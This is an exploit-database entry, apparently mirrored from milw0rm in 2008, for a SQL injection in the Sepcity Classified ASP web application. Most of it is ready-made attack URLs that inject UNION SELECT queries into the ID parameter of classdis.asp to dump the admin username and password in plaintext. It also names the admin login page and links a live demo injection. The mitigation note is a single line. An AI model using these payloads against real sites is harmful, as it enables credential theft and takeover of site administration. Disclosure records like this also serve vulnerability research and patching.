Sepcity Classified Remote SQL Injection Vulnerability

vendor:

Classified

by:

S.W.A.T.

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Classified

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Sepcity Classified Remote SQL Injection Vulnerability

A vulnerability exists in Sepcity Classified which allows an attacker to view the admin username and password in plaintext. This is done by appending 'union select 0,1,username,3 from members' to the URL for the username and 'union select 0,1,password,3 from members' for the password. The admin login page is located at http://site.com/[path]/admclassifieds.asp.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a SQL query.

Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+             Sepcity Classified Remote SQL Injection Vulnerability              +==--
--==+================================================================================+==--
-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
AUTHOR: S.W.A.T.    -   Www.BaTLaGH.coM   -   svvateam@yahoo.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
Site: http://www.sepcity.com/free_classified_software.aspx
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DORK (google): :(
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DESCRIPTION:
You Can See Admin User & Password In Plaintext
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
EXPLOITS:
for username:
www.site.com/[path]/classdis.asp?ID=1%20union%20select%200,1,username,3%20from%20members

for password:
www.site.com/[path]/classdis.asp?ID=1%20union%20select%200,1,password,3%20from%20members

Online Demo:
http://freeasp.sepcity.com/classifieds/classdis.asp?ID=1%20union%20select%200,1,2,3%20from%20members
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
NOTE/TIP:
Admin Login Is At http://site.com/[path]/admclassifieds.asp
I'll Be   A C I D A L !!!
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

--==+================================================================================+==--
--==+             Sepcity Classified Remote SQL Injection Vulnerability              +==--
--==+================================================================================+==--

# milw0rm.com [2008-12-29]